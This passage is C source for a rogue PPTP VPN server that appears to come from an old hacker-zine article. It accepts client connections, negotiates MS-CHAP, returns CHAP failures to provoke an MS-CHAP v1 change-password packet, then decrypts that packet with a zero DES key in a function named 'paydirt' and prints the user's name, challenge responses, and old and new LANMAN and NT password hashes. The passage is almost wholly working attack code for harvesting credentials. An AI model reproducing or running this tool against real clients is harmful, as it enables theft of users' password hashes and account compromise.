| u_int16_t proto; | |
| }; | |
| struct ppp_lcp_chap_header { | |
| u_int8_t code; | |
| u_int8_t ident; | |
| u_int16_t length; | |
| }; | |
| struct ppp_lcp_packet { | |
| struct ppp_header ppp; | |
| struct ppp_lcp_chap_header lcp; | |
| }; | |
| struct ppp_lcp_chap_auth_option { | |
| u_int8_t type; | |
| u_int8_t length; | |
| u_int16_t auth_proto; | |
| u_int8_t algorithm; | |
| }; | |
| struct ppp_lcp_magic_option { | |
| u_int8_t type; | |
| u_int8_t length; | |
| u_int32_t magic; | |
| }; | |
| struct ppp_lcp_pfc_option { | |
| u_int8_t type; | |
| u_int8_t length; | |
| }; | |
| struct ppp_lcp_acfc_option { | |
| u_int8_t type; | |
| u_int8_t length; | |
| }; | |
| struct ppp_chap_challenge { | |
| u_int8_t size; | |
| union { | |
| unsigned char challenge[8]; | |
| struct { | |
| unsigned char lanman[24]; | |
| unsigned char nt[24]; | |
| u_int8_t flag; | |
| } responce; | |
| } value; | |
| /* name */ | |
| }; | |
| struct ppp_mschap_change_password { | |
| char old_lanman[16]; | |
| char new_lanman[16]; | |
| char old_nt[16]; | |
| char new_nt[16]; | |
| u_int16_t pass_length; | |
| u_int16_t flags; | |
| }; | |
| #define ppp_chap_responce ppp_chap_challenge | |
| void net_init(); | |
| void getjiggywithit(); | |
| void handleit(struct sockaddr_in *); | |
| void send_start_ctrl_conn_rply(); | |
| void send_out_call_rply(struct pptp_out_call_rqst *, struct sockaddr_in *); | |
| int decaps_gre (int (*cb)(void *pack, unsigned len)); | |
| int encaps_gre (void *pack, unsigned len); | |
| int do_ppp(void *pack, unsigned len); | |
| void do_gre(struct sockaddr_in *); | |
| void send_lcp_conf_rply(void *); | |
| void send_lcp_conf_rqst(); | |
| void send_chap_challenge(); | |
| void send_chap_failure(); | |
| void print_challenge_responce(void *); | |
| void paydirt(void *); | |
| char *n; | |
| int sd, rsd, pid; | |
| void main(int argc, char **argv) | |
| { | |
| n = argv[0]; | |
| net_init(); | |
| getjiggywithit(); | |
| } | |
| void net_init() | |
| { | |
| int yes = 1; | |
| struct sockaddr_in sa; | |
| if ((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror(n); exit(1); } | |
| if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) != 0) | |
| { | |
| perror(n); | |
| exit(1); | |
| } | |
| bzero((char *) &sa, sizeof(sa)); | |
| sa.sin_family = AF_INET; | |
| sa.sin_port = htons(PPTP_PORT); | |
| sa.sin_addr.s_addr = htonl(INADDR_ANY); | |
| if (bind(sd, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror(n); exit(1); } | |
| if (listen(sd, 5) < 0) { perror(n); exit(1); } | |
| } | |
| void getjiggywithit() | |
| { | |
| struct sockaddr_in sa; | |
| int sucker, size; | |
| size = sizeof(sa); | |
| if ((sucker = accept(sd, (struct sockaddr *)&sa, &size)) == -1) | |
| { | |
| perror(n); | |
| exit(1); | |
| } | |
| close(sd); | |
| sd = sucker; | |
| handleit(&sa); | |
| exit(0); | |
| } | |
| void handleit(struct sockaddr_in *sa) | |
| { | |
| union { | |
| struct pptp_header h; | |
| unsigned char buffer[8196]; | |
| } p; | |
| int hlen, len, type; | |
| hlen = sizeof(struct pptp_header); | |
| for(;;) | |
| { | |
| len = read(sd, p.buffer, hlen); | |
| if (len == -1) { perror(n); exit(1); } | |
| if (len != hlen) { printf("Short read.\n"); exit(1); } | |
| len = read(sd, p.buffer + hlen, ntoh16(p.h.length) - hlen); | |
| if (len == -1) { perror(n); exit(1); } | |
| if (len != (ntoh16(p.h.length) - hlen)) {printf("Short read.\n"); exit(1);} | |
| if (ntoh32(p.h.magic) != 0x1A2B3C4D) { printf("Bad magic.\n"); exit(1); } | |
| if (ntoh16(p.h.pptp_type) != 1) {printf("Not a control message.\n");exit(1);} | |
| type = ntoh16(p.h.ctrl_type); | |
| switch(type) | |
| { | |
| /* we got a live one */ | |
| case PPTP_START_CTRL_CONN_RQST: | |
| send_start_ctrl_conn_rply(); | |
| break; | |
| case PPTP_OUT_CALL_RQST: | |
| send_out_call_rply((struct pptp_out_call_rqst *)&p, sa); | |
| break; | |
| case PPTP_SET_LINK_INFO: | |
| printf("<- PPTP Set Link Info\n"); | |
| break; | |
| default: | |
| printf("<- PPTP unknown packet: %d\n", type); | |
| } | |
| } | |
| } | |
| void send_start_ctrl_conn_rply() | |
| { | |
| struct pptp_start_ctrl_conn p; | |
| int len, hlen; | |
| hlen = sizeof(struct pptp_start_ctrl_conn); | |
| printf("<- PPTP Start Control Connection Request\n"); | |
| printf("-> PPTP Start Control Connection Reply\n"); | |
| bzero((char *)&p, hlen); | |
| p.header.length = hton16(hlen); | |
| p.header.pptp_type = hton16(PPTP_MESSAGE_CONTROL); | |
| p.header.magic = hton32(PPTP_MAGIC); | |
| p.header.ctrl_type = hton16(PPTP_START_CTRL_CONN_RPLY); | |
| p.version = hton16(PPTP_VERSION); | |
| p.result_code = 1; | |
| p.framing_cap = hton32(PPTP_FRAME_ASYNC); /* whatever */ | |
| p.bearer_cap = hton32(PPTP_BEARER_ANALOG); /* ditto */ | |
| bcopy("owned", p.hostname, 5); | |
| bcopy("r00t", p.vendor, 4); | |
| len = write(sd, &p, hlen); | |
| if (len == -1) { perror(n); exit(1); } | |
| if (len != hlen) { printf("Short write.\n"); exit(1); } | |
| } | |
| static gre = 0; | |
| void send_out_call_rply(struct pptp_out_call_rqst *r, struct sockaddr_in *sa) | |
| { | |
| struct pptp_out_call_rply p; | |
| int len, hlen; | |
| hlen = sizeof(struct pptp_out_call_rply); | |
| printf("<- PPTP Outgoing Call Request\n"); | |
| printf("-> PPTP Outgoing Call Reply\n"); | |
| pptp_gre_call_id = r->call_id; | |
| /* Start a process to handle the GRE/PPP packets */ | |
| if (!gre) | |
| { | |
| gre = 1; | |
| switch((pid = fork())) | |
| { | |
| case -1: | |
| perror(n); | |
| exit(1); | |
| case 0: | |
| close(sd); | |
| do_gre(sa); | |
| exit(1); /* not reached */ | |
| } | |
| } | |
| bzero((char *)&p, hlen); | |
| p.header.length = hton16(hlen); | |
| p.header.pptp_type = hton16(PPTP_MESSAGE_CONTROL); | |
| p.header.magic = hton32(PPTP_MAGIC); | |
| p.header.ctrl_type = hton16(PPTP_OUT_CALL_RPLY); | |
| p.call_id = hton16(31337); | |
| p.call_id_peer = r->call_id; | |
| p.result_code = 1; | |
| p.speed = hton32(28800); | |
| p.recv_size = hton16(5); /* whatever */ | |
| p.delay = hton16(50); /* whatever */ | |
| p.channel = hton32(31337); | |
| len = write(sd, &p, hlen); | |
| if (len == -1) { perror(n); exit(1); } | |
| if (len != hlen) { printf("Short write.\n"); exit(1); } | |
| } | |
| struct sockaddr_in src_addr; | |
| void do_gre(struct sockaddr_in *sa) | |
| { | |
| #ifndef BROKEN_RAW_CONNECT | |
| struct sockaddr_in src_addr; | |
| #endif | |
| int s, n, stat; | |
| /* Open IP protocol socket */ | |
| rsd = socket(AF_INET, SOCK_RAW, PPTP_PROTO); | |
| if (rsd<0) { perror("gre"); exit(1); } | |
| src_addr.sin_family = AF_INET; | |
| src_addr.sin_addr = sa->sin_addr; | |
| src_addr.sin_port = 0; | |
| #ifndef BROKEN_RAW_CONNECT | |
| if (connect(rsd, (struct sockaddr *) &src_addr, sizeof(src_addr))<0) { | |
| perror("gre"); exit(1); | |
| } | |
| #endif | |
| ack_sent = ack_recv = seq_sent = seq_recv = 0; | |
| stat=0; | |
| /* Dispatch loop */ | |
| while (stat>=0) { /* until error happens on s */ | |
| struct timeval tv = {0, 0}; /* non-blocking select */ | |
| fd_set rfds; | |
| int retval; | |
| n = rsd + 1; | |
| FD_ZERO(&rfds); | |
| FD_SET(rsd, &rfds); | |
| /* if there is a pending ACK, do non-blocking select */ | |
| if (ack_sent!=seq_recv) | |
| retval = select(n, &rfds, NULL, NULL, &tv); | |
| else /* otherwise, block until data is available */ | |
| retval = select(n, &rfds, NULL, NULL, NULL); | |
| if (retval==0 && ack_sent!=seq_recv) /* if outstanding ack */ | |
| encaps_gre(NULL, 0); /* send ack with no payload */ | |
| if (FD_ISSET(rsd, &rfds)) /* data waiting on socket */ | |
| stat=decaps_gre(do_ppp); | |
| } | |
| /* Close up when done. */ | |
| close(rsd); | |
| } | |
| int decaps_gre (int (*cb)(void *pack, unsigned len)) { | |
| unsigned char buffer[PACKET_MAX+64/*ip header*/]; | |
| struct pptp_gre_header *header; | |
| int status, ip_len=0; | |
| if((status=read(rsd, buffer, sizeof(buffer)))<0) | |
| {perror("gre"); exit(1); } | |
| /* strip off IP header, if present */ | |
| if ((buffer[0]&0xF0)==0x40) | |
| ip_len = (buffer[0]&0xF)*4; | |
| header = (struct pptp_gre_header *)(buffer+ip_len); | |
| /* verify packet (else discard) */ | |
| if (((ntoh8(header->ver)&0x7F)!=PPTP_GRE_VER) || /* version should be 1 */ | |
| (ntoh16(header->protocol)!=PPTP_GRE_PROTO)|| /* GRE protocol for PPTP */ | |
| PPTP_GRE_IS_C(ntoh8(header->flags)) || /* flag C should be clear */ | |
| PPTP_GRE_IS_R(ntoh8(header->flags)) || /* flag R should be clear */ | |
| (!PPTP_GRE_IS_K(ntoh8(header->flags))) || /* flag K should be set */ | |
| ((ntoh8(header->flags)&0xF)!=0)) { /* routing and recursion ctrl = 0 */ | |
| /* if invalid, discard this packet */ | |
| printf("Discarding GRE: %X %X %X %X %X %X", | |
| ntoh8(header->ver)&0x7F, ntoh16(header->protocol), | |
| PPTP_GRE_IS_C(ntoh8(header->flags)), | |
| PPTP_GRE_IS_R(ntoh8(header->flags)), | |
| PPTP_GRE_IS_K(ntoh8(header->flags)), | |
| ntoh8(header->flags)&0xF); | |
| return 0; | |
| } | |
| if (PPTP_GRE_IS_A(ntoh8(header->ver))) { /* acknowledgement present */ | |
| u_int32_t ack = (PPTP_GRE_IS_S(ntoh8(header->flags)))? | |
| header->ack:header->seq; /* ack in different place if S=0 */ | |
| if (ack > ack_recv) ack_recv = ack; | |
| /* also handle sequence number wrap-around (we're cool!) */ | |
| if (((ack>>31)==0)&&((ack_recv>>31)==1)) ack_recv=ack; | |
| } | |
| if (PPTP_GRE_IS_S(ntoh8(header->flags))) { /* payload present */ | |
| unsigned headersize = sizeof(*header); | |
| unsigned payload_len= ntoh16(header->payload_len); | |
| u_int32_t seq = ntoh32(header->seq); | |
| if (!PPTP_GRE_IS_A(ntoh8(header->ver))) headersize-=sizeof(header->ack); | |
| /* check for incomplete packet (length smaller than expected) */ | |
| if (status-headersize<payload_len) { | |
| printf("incomplete packet\n"); | |
| return 0; | |
| } | |
| /* check for out-of-order sequence number */ | |
| /* (handle sequence number wrap-around, cuz we're cool) */ | |
| if ((seq > seq_recv) || | |
| (((seq>>31)==0) && (seq_recv>>31)==1)) { | |
| seq_recv = seq; | |
| return cb(buffer+ip_len+headersize, payload_len); | |
| } else { | |
| printf("discarding out-of-order\n"); | |
| return 0; /* discard out-of-order packets */ | |
| } | |
| } | |
| return 0; /* ack, but no payload */ | |
| } | |
| int encaps_gre (void *pack, unsigned len) { | |
| union { | |
| struct pptp_gre_header header; | |
| unsigned char buffer[PACKET_MAX+sizeof(struct pptp_gre_header)]; | |
| } u; | |
| static u_int32_t seq=0; | |
| unsigned header_len; | |
| int out; | |
| /* package this up in a GRE shell. */ | |
| u.header.flags = hton8 (PPTP_GRE_FLAG_K); | |
| u.header.ver = hton8 (PPTP_GRE_VER); | |
| u.header.protocol = hton16(PPTP_GRE_PROTO); | |
| u.header.payload_len = hton16(len); | |
| u.header.call_id = hton16(pptp_gre_call_id); | |
| /* special case ACK with no payload */ | |
| if (pack==NULL) | |
| if (ack_sent != seq_recv) { | |
| u.header.ver |= hton8(PPTP_GRE_FLAG_A); | |
| u.header.payload_len = hton16(0); | |
| u.header.seq = hton32(seq_recv); /* ack is in odd place because S=0 */ | |
| ack_sent = seq_recv; | |
| #ifndef BROKEN_RAW_CONNCET | |
| return write(rsd, &u.header, sizeof(u.header)-sizeof(u.header.seq)); | |
| #else | |
| return sendto(rsd, &u.header, sizeof(u.header)-sizeof(u.header.seq), 0, | |
| (struct sockaddr *) &src_addr, sizeof(src_addr)); | |
| #endif | |
| } else return 0; /* we don't need to send ACK */ | |
| /* send packet with payload */ | |
| u.header.flags |= hton8(PPTP_GRE_FLAG_S); | |
| u.header.seq = hton32(seq); | |
| if (ack_sent != seq_recv) { /* send ack with this message */ | |
| u.header.ver |= hton8(PPTP_GRE_FLAG_A); | |
| u.header.ack = hton32(seq_recv); | |
| ack_sent = seq_recv; | |
| header_len = sizeof(u.header); | |
| } else { /* don't send ack */ | |
| header_len = sizeof(u.header) - sizeof(u.header.ack); | |
| } | |
| if (header_len+len>=sizeof(u.buffer)) return 0; /* drop this, it's too big */ | |
| /* copy payload into buffer */ | |
| memcpy(u.buffer+header_len, pack, len); | |
| /* record and increment sequence numbers */ | |
| seq_sent = seq; seq++; | |
| /* write this baby out to the net */ | |
| #ifndef BROKEN_RAW_CONNECT | |
| return write(rsd, u.buffer, header_len+len); | |
| #else | |
| return sendto(rsd, &u.buffer, header_len+len, 0, | |
| (struct sockaddr *) &src_addr, sizeof(src_addr)); | |
| #endif | |
| } | |
| int do_ppp(void *pack, unsigned len) | |
| { | |
| struct { | |
| struct ppp_header ppp; | |
| struct ppp_lcp_chap_header header; | |
| } *p; | |
| p = pack; | |
| switch(ntoh16(p->ppp.proto)) | |
| { | |
| case PPP_PROTO_LCP: | |
| switch(ntoh8(p->header.code)) | |
| { | |
| case PPP_LCP_CODE_CONF_RQST: | |
| printf("<- LCP Configure Request\n"); | |
| send_lcp_conf_rply(pack); | |
| send_lcp_conf_rqst(); | |
| break; | |
| case PPP_LCP_CODE_CONF_ACK: | |
| printf("<- LCP Configure Ack\n"); | |
| send_chap_challenge(pack); | |
| break; | |
| case PPP_LCP_CODE_IDENT: | |
| /* ignore */ | |
| break; | |
| default: | |
| printf("<- LCP unknown packet: C=%X I=%X L=%X\n", p->header.code, | |
| p->header.ident, ntoh16(p->header.length)); | |
| } | |
| break; | |
| case PPP_PROTO_CHAP: | |
| switch(ntoh8(p->header.code)) | |
| { | |
| case PPP_CHAP_CODE_RESPONCE: | |
| printf("<- CHAP Responce\n"); | |
| print_challenge_responce(pack); | |
| send_chap_failure(); | |
| break; | |
| case PPP_CHAP_CODE_MSCHAP_PASSWORD_V1: | |
| paydirt(pack); | |
| break; | |
| default: | |
| printf("<- CHAP unknown packet: C=%X I=%X L=%X\n", p->header.code, | |
| p->header.ident, ntoh16(p->header.length)); | |
| } | |
| break; | |
| default: | |
| printf("<- PPP unknwon packet: %X\n", ntoh16(p->ppp.proto)); | |
| } | |
| return(1); | |
| } | |
| void send_lcp_conf_rply(void *pack) | |
| { | |
| struct { | |
| struct ppp_header ppp; | |
| struct ppp_lcp_chap_header lcp; | |
| } *p = pack; | |
| printf("-> LCP Configure Ack\n"); | |
| p->lcp.code = hton8(PPP_LCP_CODE_CONF_ACK); | |
| encaps_gre(p, ntoh16(p->lcp.length) + sizeof(struct ppp_header)); | |
| } | |
| void send_lcp_conf_rqst() | |
| { | |
| struct { | |
| struct ppp_header ppp; | |
| struct ppp_lcp_chap_header lcp; | |
| struct ppp_lcp_chap_auth_option auth; | |
| } pkt; | |
| printf("-> LCP Configure Request\n"); | |
| bzero(&pkt, sizeof(pkt)); | |
| pkt.ppp.address = hton8(PPP_ADDRESS); | |
| pkt.ppp.control = hton8(PPP_CONTROL); | |
| pkt.ppp.proto = hton16(PPP_PROTO_LCP); | |
| pkt.lcp.code = hton8(PPP_LCP_CODE_CONF_RQST); | |
| pkt.lcp.ident = hton8(9); | |
| pkt.lcp.length = hton16(4 +5); | |
| pkt.auth.type = hton8(PPP_LCP_CONFIG_OPT_AUTH); | |
| pkt.auth.length = hton8(5); | |
| pkt.auth.auth_proto = hton16(PPP_PROTO_CHAP); | |
| pkt.auth.algorithm = hton8(PPP_LCP_AUTH_CHAP_ALGO_MSCHAP); | |
| encaps_gre(&pkt, 13); | |
| } | |
| void send_chap_challenge() | |
| { | |
| struct { | |
| struct ppp_header ppp; | |
| struct ppp_lcp_chap_header chap; | |
| struct ppp_chap_challenge challenge; | |
| } pkt; | |
| printf("-> CHAP Challenge\n"); | |
| bzero(&pkt, sizeof(pkt)); | |
| pkt.ppp.address = hton8(PPP_ADDRESS); | |
| pkt.ppp.control = hton8(PPP_CONTROL); | |
| pkt.ppp.proto = hton16(PPP_PROTO_CHAP); | |
| pkt.chap.code = hton8(PPP_CHAP_CODE_CHALLENGE); | |
| pkt.chap.length = hton16(13); | |
| pkt.challenge.size = hton8(8); | |
| encaps_gre(&pkt, 4 + 13); | |
| } | |
| void print_challenge_responce(void *pack) | |
| { | |
| unsigned char name[512], *c; | |
| int len; | |
| struct { | |
| struct ppp_header ppp; | |
| struct ppp_lcp_chap_header chap; | |
| struct ppp_chap_challenge responce; | |
| } *p; | |
| p = pack; | |
| c = p->responce.value.responce.lanman; | |
| printf(" LANMAN Responce: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X\n", | |
| c[ 0], c[ 1], c[ 2], c[ 3], c[ 4], c[ 5], c[ 6], c[ 7], c[ 8], c[ 9], c[10], | |
| c[11], c[12], c[13], c[14], c[15], c[16], c[17], c[18], c[19], c[20], c[21], | |
| c[22], c[23]); | |
| c = p->responce.value.responce.nt; | |
| printf(" NTHash Responce: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X\n", | |
| c[ 0], c[ 1], c[ 2], c[ 3], c[ 4], c[ 5], c[ 6], c[ 7], c[ 8], c[ 9], c[10], | |
| c[11], c[12], c[13], c[14], c[15], c[16], c[17], c[18], c[19], c[20], c[21], | |
| c[22], c[23]); | |
| printf(" Use NT hash: %d\n", p->responce.value.responce.flag); | |
| bzero(name, 512); | |
| len = ntoh16(p->chap.length) - 54; | |
| bcopy(((char *)p) + 4 + 54, name, len); | |
| name[len] = '\0'; | |
| printf(" User: %s\n", name); | |
| } | |
| void send_chap_failure() | |
| { | |
| struct { | |
| struct ppp_header ppp; | |
| struct ppp_lcp_chap_header chap; | |
| char message[64]; | |
| } pkt; | |
| printf("-> CHAP Failure\n"); | |
| bzero(&pkt, sizeof(pkt)); | |
| pkt.ppp.address = hton8(PPP_ADDRESS); | |
| pkt.ppp.control = hton8(PPP_CONTROL); | |
| pkt.ppp.proto = hton16(PPP_PROTO_CHAP); | |
| pkt.chap.code = hton8(PPP_CHAP_CODE_FAILURE); | |
| pkt.chap.length = hton16(4 + strlen(MSCHAP_ERROR)); | |
| strncpy(pkt.message, MSCHAP_ERROR, strlen(MSCHAP_ERROR)); | |
| encaps_gre(&pkt, 4 + 4 + strlen(MSCHAP_ERROR)); | |
| } | |
| extern int des_check_key; | |
| void paydirt(void *pack) | |
| { | |
| unsigned char out[8], out2[8], key[8]; | |
| struct { | |
| struct ppp_header ppp; | |
| struct ppp_lcp_chap_header chap; | |
| struct ppp_mschap_change_password passwds; | |
| } *pkt; | |
| des_key_schedule ks; | |
| pkt = pack; | |
| bzero(key, 8); | |
| printf("<- MSCHAP Change Password Version 1 Packet.\n"); | |
| /* Turn off checking for weak keys within libdes */ | |
| des_check_key=0; | |
| des_set_odd_parity((des_cblock *)key); | |
| des_set_key((des_cblock *)key, ks); | |
| des_ecb_encrypt((des_cblock *)pkt->passwds.old_lanman,(des_cblock *) out, ks, 0); | |
| des_ecb_encrypt((des_cblock *)(pkt->passwds.old_lanman + 8), (des_cblock *)out2, ks, 0); | |
| printf(" Old LANMAN: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X\n", | |
| out [0], out [1], out [2], out [3], out [4], out [5], out [6], out [7], | |
| out2[0], out2[1], out2[2], out2[3], out2[4], out2[5], out2[6], out2[7]); | |
| des_ecb_encrypt((des_cblock *)pkt->passwds.new_lanman,(des_cblock *) out, ks, 0); | |
| des_ecb_encrypt((des_cblock *)(pkt->passwds.new_lanman + 8), (des_cblock *)out2, ks, 0); | |
| printf(" New LANMAN: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X\n", | |
| out [0], out [1], out [2], out [3], out [4], out [5], out [6], out [7], | |
| out2[0], out2[1], out2[2], out2[3], out2[4], out2[5], out2[6], out2[7]); | |
| des_ecb_encrypt((des_cblock *)pkt->passwds.old_nt,(des_cblock *) out, ks, 0); | |
| des_ecb_encrypt((des_cblock *)(pkt->passwds.old_nt + 8), (des_cblock *)out2, ks, 0); | |
| printf(" Old NTHash: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X\n", | |
| out [0], out [1], out [2], out [3], out [4], out [5], out [6], out [7], | |
| out2[0], out2[1], out2[2], out2[3], out2[4], out2[5], out2[6], out2[7]); | |
| des_ecb_encrypt((des_cblock *)pkt->passwds.new_nt,(des_cblock *) out, ks, 0); | |
| des_ecb_encrypt((des_cblock *)(pkt->passwds.new_nt + 8), (des_cblock *)out2, ks, 0); | |
| printf(" New NTHash: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X\n", | |
| out [0], out [1], out [2], out [3], out [4], out [5], out [6], out [7], | |
| out2[0], out2[1], out2[2], out2[3], out2[4], out2[5], out2[6], out2[7]); | |
| printf(" New Password Length: %d\n", ntoh16(pkt->passwds.pass_length)); | |
| kill(pid, SIGTERM); | |
| exit(0); | |
| } | |
| <--> | |
| ----[ EOF | |